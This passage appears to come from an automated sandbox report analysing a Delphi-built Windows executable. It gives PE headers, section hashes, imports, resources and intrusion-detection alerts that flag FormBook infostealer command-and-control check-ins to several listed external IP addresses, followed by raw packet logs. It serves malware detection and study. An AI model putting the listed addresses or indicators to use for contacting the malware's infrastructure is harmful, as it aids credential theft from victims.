                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:aff85430390d0615c71e66b14d9cd545
                                                                                                  Instruction
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  add esp, FFFFFFF0h
                                                                                                  push ebx
                                                                                                  mov eax, 004A2EC0h
                                                                                                  call 00007FD2F0A90D60h
                                                                                                  mov ebx, dword ptr [004A7858h]
                                                                                                  mov eax, dword ptr [ebx]
                                                                                                  call 00007FD2F0AF4083h
                                                                                                  mov ecx, dword ptr [004A764Ch]
                                                                                                  mov eax, dword ptr [ebx]
                                                                                                  mov edx, dword ptr [0049FE0Ch]
                                                                                                  call 00007FD2F0AF4088h
                                                                                                  mov ecx, dword ptr [004A78F0h]
                                                                                                  mov eax, dword ptr [ebx]
                                                                                                  mov edx, dword ptr [004A2B08h]
                                                                                                  call 00007FD2F0AF4075h
                                                                                                  mov ecx, dword ptr [004A79B0h]
                                                                                                  mov eax, dword ptr [ebx]
                                                                                                  mov edx, dword ptr [004A1F50h]
                                                                                                  call 00007FD2F0AF4062h
                                                                                                  mov ecx, dword ptr [004A7690h]
                                                                                                  mov eax, dword ptr [ebx]
                                                                                                  mov edx, dword ptr [004A27E8h]
                                                                                                  call 00007FD2F0AF404Fh
                                                                                                  mov eax, dword ptr [ebx]
                                                                                                  call 00007FD2F0AF40C8h
                                                                                                  pop ebx
                                                                                                  call 00007FD2F0A8EA86h
                                                                                                  nop
add byte ptr [eax], al   ; repeated 40 times: the bytes after the entry routine are 00 00 padding, which disassembles to this instruction
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xac000          0x2b56        .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xbc000          0x99e00       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xb1000          0xa9a8        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0xb0000          0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xac818          0x6b0         .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text   0x1000           0xa2118       0xa2200   e74c913ec359d14f19f2e0206491ed56  False     0.5065852086545876   data       6.535130333377707   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext  0xa4000          0x88c         0xa00     2b7c8657795bffe278c3e9eea9302729  False     0.54296875           data       5.7007896228068695  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data   0xa5000          0x2a1c        0x2c00    c90dd31314dcbbcc2c3513dd910ecb9a  False     0.41060014204545453  data       4.209972713780321   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss    0xa8000          0x3714        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata  0xac000          0x2b56        0x2c00    ef49943757421d602f9ae4727dfb4f2c  False     0.3165838068181818   data       5.166724466195998   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls    0xaf000          0x40          0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata  0xb0000          0x18          0x200     00113f4675e11f281d6309af00b17699  False     0.05078125           data       0.190488766434666   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xb1000          0xa9a8        0xaa00    edb9b5098fed26af445bbdf93ea19fd7  False     0.575390625          data       6.666923999952873   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc   0xbc000          0x99e00       0x99e00   b844e56e130e271d255180c509f5319d  False     0.5304090932168968   data       6.797506991881448   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0xbcb64 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0xbcc98 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0xbcdcc | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0xbcf00 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0xbd034 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0xbd168 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0xbd29c | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0xbd3d0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0xbd5a0 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0xbd784 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0xbd954 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0xbdb24 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0xbdcf4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0xbdec4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0xbe094 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0xbe264 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0xbe434 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0xbe604 | 0x837e8 | Device independent bitmap graphic, 527 x 340 x 24, image size 538560, resolution 11811 x 11811 px/m | English | United States | 0.5818306721128853
RT_BITMAP | 0x141dec | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_ICON | 0x141ed4 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 33364 x 33364 px/m | | | 0.4858156028368794
RT_ICON | 0x14233c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 33364 x 33364 px/m | | | 0.17240663900414938
RT_DIALOG | 0x1448e4 | 0x52 | data | | | 0.7682926829268293
RT_DIALOG | 0x144938 | 0x52 | data | | | 0.7560975609756098
RT_STRING | 0x14498c | 0x1ec | data | | | 0.5670731707317073
RT_STRING | 0x144b78 | 0x2fc | data | | | 0.4568062827225131
RT_STRING | 0x144e74 | 0xb8 | data | | | 0.6793478260869565
RT_STRING | 0x144f2c | 0xf8 | data | | | 0.6290322580645161
RT_STRING | 0x145024 | 0x248 | data | | | 0.4914383561643836
RT_STRING | 0x14526c | 0x3d0 | data | | | 0.3770491803278688
RT_STRING | 0x14563c | 0x38c | data | | | 0.40969162995594716
RT_STRING | 0x1459c8 | 0x384 | data | | | 0.3877777777777778
RT_STRING | 0x145d4c | 0x3f8 | data | | | 0.3661417322834646
RT_STRING | 0x146144 | 0xf4 | data | | | 0.5532786885245902
RT_STRING | 0x146238 | 0xc4 | data | | | 0.6275510204081632
RT_STRING | 0x1462fc | 0x22c | data | | | 0.5017985611510791
RT_STRING | 0x146528 | 0x3ac | data | | | 0.31063829787234043
RT_STRING | 0x1468d4 | 0x38c | data | | | 0.3876651982378855
RT_STRING | 0x146c60 | 0x2a4 | data | | | 0.4230769230769231
RT_RCDATA | 0x146f04 | 0x10 | data | | | 1.5
RT_RCDATA | 0x146f14 | 0x324 | data | | | 0.7052238805970149
RT_RCDATA | 0x147238 | 0xb5a5 | RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 22050 Hz | English | United States | 0.17223285520741488
RT_RCDATA | 0x1527e0 | 0x351a | Delphi compiled form 'TMainForm' | | | 0.17882889510077976
RT_GROUP_CURSOR | 0x155cfc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x155d10 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x155d24 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x155d38 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x155d4c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x155d60 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x155d74 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x155d88 | 0x22 | data | | | 1.0588235294117647
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DeferWindowPos, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, BeginDeferWindowPos, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
msimg32.dll | GradientFill
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePen, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalHandle, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetExitCodeThread, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteFileA, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
ole32.dll | CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll | SHFileOperationA
shell32.dll | SHGetPathFromIDListA, SHBrowseForFolderA
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-30T10:57:03.587981+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49710 | 142.250.186.174 | 443 | TCP
2024-12-30T10:57:04.990462+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49711 | 172.217.16.193 | 443 | TCP
2024-12-30T10:58:27.534284+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49987 | 188.114.97.3 | 80 | TCP
2024-12-30T10:58:27.534284+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49987 | 188.114.97.3 | 80 | TCP
2024-12-30T10:58:43.355868+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49988 | 52.223.13.41 | 80 | TCP
2024-12-30T10:58:45.893956+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49989 | 52.223.13.41 | 80 | TCP
2024-12-30T10:58:48.451399+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49990 | 52.223.13.41 | 80 | TCP
2024-12-30T10:58:50.986008+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49991 | 52.223.13.41 | 80 | TCP
2024-12-30T10:58:50.986008+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49991 | 52.223.13.41 | 80 | TCP
2024-12-30T10:58:57.038535+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49993 | 108.179.193.23 | 80 | TCP
2024-12-30T10:58:59.564543+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49994 | 108.179.193.23 | 80 | TCP
2024-12-30T10:59:02.166341+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49995 | 108.179.193.23 | 80 | TCP
2024-12-30T10:59:04.630258+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49996 | 108.179.193.23 | 80 | TCP
2024-12-30T10:59:04.630258+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49996 | 108.179.193.23 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                  Dec 30, 2024 10:57:07.508183002 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.508205891 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.508213043 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.508260012 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.513662100 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.519093037 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.519124985 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.519275904 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.519288063 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.519341946 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.524672985 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.530132055 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.530183077 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.530189991 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.546858072 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.546894073 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.546916008 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.546924114 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.546996117 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.547000885 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.548585892 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.548635006 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.548640013 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.554207087 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.554239988 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.554267883 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.554272890 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.554316044 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.559274912 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.564596891 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.564627886 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.564652920 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.564659119 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.564701080 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.569261074 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.574035883 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.574074030 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.574096918 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.574104071 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.574158907 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.578366041 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.582834959 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.582865953 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.582890034 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.582895041 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.582951069 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.587368011 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.591742039 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.591778994 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.591782093 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.591794968 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.591847897 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.596118927 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.600636005 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.600665092 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.600677967 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.600683928 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.600723028 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.604840994 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.608711004 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.608743906 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.608752966 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.608757019 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.608803034 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.608805895 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.612714052 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.612754107 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.612761974 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.612767935 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.612806082 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.616411924 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.620095015 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.620134115 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.620147943 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.620155096 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.620196104 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.623568058 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.627027988 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.627074957 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.627078056 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.627089024 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.627141953 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.630472898 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.633892059 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.633923054 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.633929014 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.633944035 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.633984089 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.637183905 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.639946938 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.639988899 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.639998913 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.640007019 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.640048981 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.641393900 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.644917011 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.644956112 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.644964933 CET49711443192.168.2.6172.217.16.193
